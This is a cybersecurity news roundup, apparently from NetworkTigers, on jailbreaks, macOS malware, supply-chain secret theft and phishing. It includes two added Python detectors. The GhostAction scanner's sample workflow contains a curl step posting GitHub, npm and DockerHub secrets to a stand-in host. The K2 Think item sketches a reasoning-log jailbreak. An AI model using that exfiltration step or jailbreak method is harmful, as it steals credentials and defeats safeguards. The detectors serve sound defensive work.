September 15, 2025

News roundup September 15, 2025

San Mateo, CA, September 15, 2025 — Stories, events, and developments that impacted the cybersecurity landscape last week, including emerging threats, policy changes, and industry responses.

K2 Think AI jailbroken just days after release

Just two days after its Sept. 9 release, researchers demonstrated a jailbreak of K2 Think, a new large language model from the UAE’s Mohamed bin Zayed University of Artificial Intelligence and G42. Marketed as the “world’s most parameter-efficient advanced reasoning model,” K2 runs on 32 billion parameters yet claims reasoning and coding performance comparable to much larger systems such as OpenAI’s o3 and DeepSeek’s R1. But Adversa AI’s Alex Polyakov showed that its radical transparency, in the form of exposed detailed reasoning logs, makes it easier to exploit. Using a flaw called Partial Prompt Leaking, Polyakov bypassed restrictions in just three attempts. “When the reasoning layer is visible, K2 is easier to map and jailbreak than typical models,” Polyakov told Dark Reading. “We didn’t need clever wordplay or advanced multi-step attacks; the system taught us how to beat it in three tries.” Read more.

ChillyHell malware exploits Apple’s notarization loophole

ChillyHell, a newly uncovered modular backdoor targeting macOS, has been active since at least 2021 but surfaced publicly in May 2025, according to Jamf researchers. The malware exploits Apple’s notarization process to appear legitimate, helping it evade detection by major antivirus tools. Delivered via compromised websites posing as productivity apps, ChillyHell profiles host systems before establishing dual-stage persistence through LaunchAgents or LaunchDaemons, with added resilience via shell profile injections. It further obscures activity by backdating timestamps to blend with legitimate system events. ChillyHell communicates with command-and-control servers over HTTP and DNS, supporting reverse shells, updates, and password brute-forcing. Read more.

Ransomware costs in education drop sharply

Ransomware demands and payments in the education sector have dropped sharply over the past year, according to a new report from Sophos. Average demands to lower education providers fell 74% from $3.85 million in 2024 to $1.02 million, while higher education demands plunged 80% to $697,000. Payments followed the same trend, with median payouts in lower education down 88% to $800,000 and higher education dropping from $4.41 million to $463,000. Sophos attributed the decline to stronger defenses, faster recovery, and improved negotiation. Recovery costs in higher education fell 77% to $900,000, while more attacks were stopped before data encryption. Phishing and exploited vulnerabilities remain leading attack vectors. Read more.

California, Connecticut, and Colorado crack down on data-privacy violations

A multi-state privacy enforcement sweep began this week, targeting companies that ignore consumer opt-out laws. Regulators in California, Connecticut, and Colorado, joined by the California Privacy Protection Agency, are investigating businesses that fail to process opt-out requests or recognize Global Privacy Control (GPC) signals. California Attorney General Rob Bonta stressed that companies must honor consumer rights to stop data sales, while Connecticut Attorney General William Tong warned that compliance is “non-negotiable.” GPC, a browser-based tool, automatically signals websites to halt data collection for sales or targeted ads, but many businesses evade the requirement. The sweep marks one of the largest efforts to enforce U.S. data privacy protections. Read more.

Lazarus Group targets developers through Git symlink vulnerability

Cybersecurity researchers have identified a sophisticated new phishing campaign by Lazarus Group that targets developers and crypto professionals through a Git symlink vulnerability. Instead of traditional malware, the attackers exploit how Git handles repository paths, embedding malicious post-checkout hooks within symbolic links so that code executes during routine operations and evades standard scanners. The campaign begins with personalized messages on professional networking sites inviting victims to mock technical interviews, then prompts them to run a single Git clone command. The hidden Node.js backdoor siphons credentials, system information, and wallet data while maintaining persistence by cleaning project files. This operation combines social engineering with supply chain compromise, highlighting the risks posed when trusted development tools are weaponized. Read more.

APT41 targets U.S. trade officials in cyber-espionage campaign

The House Select Committee on China has issued an advisory regarding an “ongoing” cyber espionage campaign by the Chinese threat group APT41 targeting U.S. trade officials during 2025 negotiations. “These campaigns seek to compromise organizations and individuals involved in U.S.–China trade policy and diplomacy, including U.S. government agencies, U.S. business organizations, D.C. law firms and think tanks, and at least one foreign government,” the committee said. The attackers impersonated Congressman John Robert Moolenaar, the committee’s chair, in phishing emails crafted to trick recipients into opening malicious attachments. Moolenaar condemned the operation, calling it “another example of China’s offensive cyber operations designed to steal American strategy and leverage it against Congress, the Administration, and the American people.” “China firmly opposes and combats all forms of cyber attacks and cyber crime,” the Chinese embassy in Washington told Reuters in a statement. “We also firmly oppose smearing others without solid evidence.” Read more.

Hackers send 50,000+ phishing emails daily via Amazon SES

Researchers have uncovered a cybercriminal campaign abusing Amazon’s Simple Email Service (SES) to send over 50,000 phishing emails per day, transforming AWS’s bulk email tool into a large-scale attack platform. The operation relies on compromised AWS access keys, often leaked through misconfigured assets or exposed in code, which attackers use to escalate SES accounts out of “sandbox” mode via a novel multi-regional tactic. Victims are targeted with tax-themed lures directing them to credential-harvesting domains. The attackers registered both attacker-controlled and weakly protected domains as verified sending domains, deployed spoofed email addresses, and attempted automated privilege escalation. The campaign highlights how cloud services can be weaponized, underscoring the need for stricter monitoring of access keys and API activity. Read more.

ICE revives $2 million spyware contract with Paragon

ICE has revived a $2 million contract with Israeli spyware maker Paragon after nearly a year under a Biden administration “stop work order” meant to assess compliance with limits on commercial spyware use. Public records show the order was lifted on August 30, activating the deal for licenses, hardware, maintenance, and training. Paragon, which markets itself as an ethical alternative to NSO Group and others, faces scrutiny following revelations that its spyware, Graphite, was used against journalists and activists in Italy. Citizen Lab’s John Scott-Railton warned such tools “were designed for dictatorships, not democracies built on liberty and protection of individual rights,” highlighting ongoing concerns that U.S. agencies could expand controversial surveillance practices. Read more.

GhostAction attack on GitHub steals thousands of secrets

A large-scale GitHub supply chain attack has compromised 327 users and 817 repositories, with over 3,300 secrets stolen, according to GitGuardian. The campaign, dubbed “GhostAction,” began when a maintainer account tied to the FastUUID project was compromised, pushing a malicious GitHub workflow to exfiltrate tokens. “The attacker’s inaction during the three days following the initial compromise suggested FastUUID was not the primary target. Our investigation revealed a much larger operation,” said GitGuardian investigators. They then uncovered hundreds of similar commits across other projects, stealing DockerHub credentials, GitHub tokens, npm tokens, AWS keys, and database credentials. Some organizations saw their entire SDK portfolios affected. While 100 repositories have reverted changes, many remain at risk. GitGuardian has alerted GitHub, npm, and PyPI, warning that additional packages could soon be compromised. Read more.
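The GhostAction item describes a workflow pushed by a compromised maintainer account that exfiltrates repository secrets. The following is an added example, not code from the article or from GitGuardian, of the kind of heuristic review a defender can run over workflow files before trusting a commit: it splits a workflow into steps and flags any step that references `${{ secrets.* }}` while also invoking a network tool against a host outside an allow-list. The workflow text, the allow-list, and the host `collector.example.invalid` are constructed for the example; the step parser is intentionally line-based so it needs no YAML library.

```python
"""Heuristic scan of a GitHub Actions workflow for secret exfiltration.

Added example (not part of the original article). Assumptions:
  - secrets are referenced with the ${{ secrets.NAME }} syntax;
  - a step that combines a secret reference, a network tool and an
    untrusted host is worth a human look (it is a heuristic, not proof);
  - TRUSTED_HOSTS is a constructed allow-list that a real team would tune.
"""
import re

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}")
NETWORK_TOOL = re.compile(r"\b(curl|wget|ncat)\b")
URL = re.compile(r"https?://([A-Za-z0-9.-]+)")

# Constructed allow-list of hosts a publish step legitimately talks to.
TRUSTED_HOSTS = {
    "github.com", "api.github.com", "uploads.github.com",
    "registry.npmjs.org", "upload.pypi.org", "hub.docker.com",
}

# Constructed sample: a normal publish job with one suspicious step.
SAMPLE_WORKFLOW = """\
name: CI
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Publish
        run: npm publish
        env:
          NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
      - name: Upload release
        run: curl -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" https://api.github.com/repos/o/r/releases
      - name: Sync metadata
        env:
          GH: ${{ secrets.GITHUB_TOKEN }}
          NPM: ${{ secrets.NPM_TOKEN }}
          DOCKER: ${{ secrets.DOCKERHUB_PASSWORD }}
        run: |
          curl -s -X POST https://collector.example.invalid/ping -d "$GH:$NPM:$DOCKER"
"""


def split_steps(text):
    """Return each step under a `steps:` key as one text block.

    A step begins at a list item ("- ") at the indentation of the first
    item after `steps:`; deeper list items belong to the current step.
    """
    steps, current = [], None
    steps_indent = step_indent = None
    for line in text.splitlines():
        stripped = line.lstrip()
        indent = len(line) - len(stripped)
        if stripped.startswith("steps:"):
            if current:
                steps.append(current)
            current, steps_indent, step_indent = None, indent, None
            continue
        if steps_indent is None:
            continue
        if stripped and indent <= steps_indent:  # dedent: left the steps list
            if current:
                steps.append(current)
            current = steps_indent = step_indent = None
            continue
        if stripped.startswith("- ") and (step_indent is None or indent == step_indent):
            if current:
                steps.append(current)
            step_indent = indent
            current = [line]
        elif current is not None:
            current.append(line)
    if current:
        steps.append(current)
    return ["\n".join(s) for s in steps]


def find_exfil_steps(text):
    """Flag steps that send secrets to hosts outside TRUSTED_HOSTS."""
    findings = []
    for step in split_steps(text):
        secrets = set(SECRET_REF.findall(step))
        untrusted = {h for h in URL.findall(step) if h not in TRUSTED_HOSTS}
        if secrets and untrusted and NETWORK_TOOL.search(step):
            name = re.search(r"name:\s*(.+)", step)
            findings.append({
                "step": name.group(1).strip() if name else "<unnamed>",
                "secrets": sorted(secrets),
                "hosts": sorted(untrusted),
            })
    return findings


if __name__ == "__main__":
    for f in find_exfil_steps(SAMPLE_WORKFLOW):
        print(f"SUSPICIOUS step {f['step']!r}: {f['secrets']} -> {f['hosts']}")
```

The "Upload release" step also mixes a secret with curl, but its only host is on the allow-list, so it is not reported; the allow-list is what keeps this check usable on real repositories, and it should be reviewed with the same care as the workflow itself.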

Phishing scams spread through iCloud Calendar invites

Attackers are exploiting iCloud Calendar invites to deliver callback phishing scams that appear to come directly from Apple’s email servers, increasing their chances of bypassing spam filters. One victim received a legitimate-looking PayPal receipt for $599, urging them to call a listed number to dispute the charge. Once on the phone, scammers attempt to trick targets into granting remote access, enabling theft of funds, malware deployment, or data exfiltration. The phishing messages pass SPF, DKIM, and DMARC checks because they originate from Apple’s servers, lending credibility. Security experts warn that unexpected iCloud Calendar invites containing odd payment or account messages should be ignored or deleted to avoid compromise. Read more.
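The iCloud Calendar item makes a point worth turning into a concrete check: a passing SPF, DKIM and DMARC result only tells you which infrastructure sent the message, not whether the invite inside is a scam. The following is an added example, not code from the article or from any vendor, of a triage function that records the authentication verdict but scores the iCalendar DESCRIPTION on its own content (a currency amount, a phone number, and "call ... immediately/dispute" phrasing). Both messages, the `Authentication-Results` values, and the phone number are constructed for the example.

```python
"""Triage calendar-invite emails for callback-phishing signals.

Added example (not part of the original article). Assumptions:
  - the invite arrives as a text/calendar part with a DESCRIPTION property;
  - Authentication-Results was written by the receiving MTA in the usual
    "spf=pass ... dkim=pass ... dmarc=pass" form;
  - two or more content signals are enough to route the message to review.
"""
import email
import re
from email import policy

# Constructed sample: authentication passes, but the body is a callback lure.
SAMPLE_PHISH = b"""\
From: noreply@email.apple.com
To: victim@example.com
Subject: Invitation: Your PayPal receipt
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=email.apple.com; dkim=pass header.d=email.apple.com; dmarc=pass header.from=email.apple.com
Content-Type: text/calendar; charset="utf-8"; method=REQUEST

BEGIN:VCALENDAR
METHOD:REQUEST
BEGIN:VEVENT
SUMMARY:PayPal receipt
DESCRIPTION:A charge of $599.00 was made on your account. If you did not
  authorize this purchase call +1 (555) 010-0199 immediately to dispute.
END:VEVENT
END:VCALENDAR
"""

# Constructed sample: an ordinary invite from the same infrastructure.
SAMPLE_BENIGN = b"""\
From: noreply@email.apple.com
To: victim@example.com
Subject: Invitation: Weekly sync
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=email.apple.com; dkim=pass header.d=email.apple.com; dmarc=pass header.from=email.apple.com
Content-Type: text/calendar; charset="utf-8"; method=REQUEST

BEGIN:VCALENDAR
METHOD:REQUEST
BEGIN:VEVENT
SUMMARY:Weekly sync
DESCRIPTION:Agenda is in the shared doc. Dial-in details unchanged.
END:VEVENT
END:VCALENDAR
"""

CURRENCY = re.compile(r"[$\u20ac\u00a3]\s?\d[\d,]*(?:\.\d{2})?")
PHONE = re.compile(r"\+?\d[\d\s().-]{8,}\d")
CALLBACK = re.compile(
    r"\b(call|phone|contact)\b.{0,40}\b(number|immediately|dispute|cancel|refund)\b",
    re.I,
)


def parse_auth_results(msg):
    """Map spf/dkim/dmarc to their verdicts from Authentication-Results."""
    header = msg.get("Authentication-Results", "")
    return dict(re.findall(r"\b(spf|dkim|dmarc)=(\w+)", header))


def extract_description(msg):
    """Return the unfolded, unescaped DESCRIPTION of the first calendar part."""
    for part in msg.walk():
        if part.get_content_type() != "text/calendar":
            continue
        text = part.get_content()
        text = re.sub(r"\r?\n[ \t]", "", text)  # RFC 5545 line unfolding
        m = re.search(r"^DESCRIPTION[^:]*:(.*)$", text, re.M)
        if m:
            return m.group(1).replace("\\,", ",").replace("\\n", " ")
    return ""


def triage(raw):
    """Score the invite body independently of the authentication result."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    desc = extract_description(msg)
    auth = parse_auth_results(msg)
    signals = {
        "currency_amount": bool(CURRENCY.search(desc)),
        "phone_number": bool(PHONE.search(desc)),
        "callback_phrasing": bool(CALLBACK.search(desc)),
    }
    return {
        "auth_passed": all(auth.get(k) == "pass" for k in ("spf", "dkim", "dmarc")),
        "signals": signals,
        "verdict": "callback-phish-suspect" if sum(signals.values()) >= 2 else "ok",
    }


if __name__ == "__main__":
    for label, raw in (("phish", SAMPLE_PHISH), ("benign", SAMPLE_BENIGN)):
        print(label, triage(raw))
```

Both messages authenticate identically, which is exactly why `auth_passed` is reported but never used in the verdict; the decision rests on what the invite asks the recipient to do.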

About NetworkTigers

NetworkTigers is the leader in the secondary market for Grade A, seller-refurbished networking equipment. Founded in January 1996 as Andover Consulting Group, which built and re-architected data centers for Fortune 500 firms, NetworkTigers provides consulting and network equipment to global governmental agencies, Fortune 2000, and healthcare companies. www.networktigers.com.

Ben Walker
Ben Walker is a freelance research-based technical writer. He has worked as a content QA analyst for AT&T and Pernod Ricard.
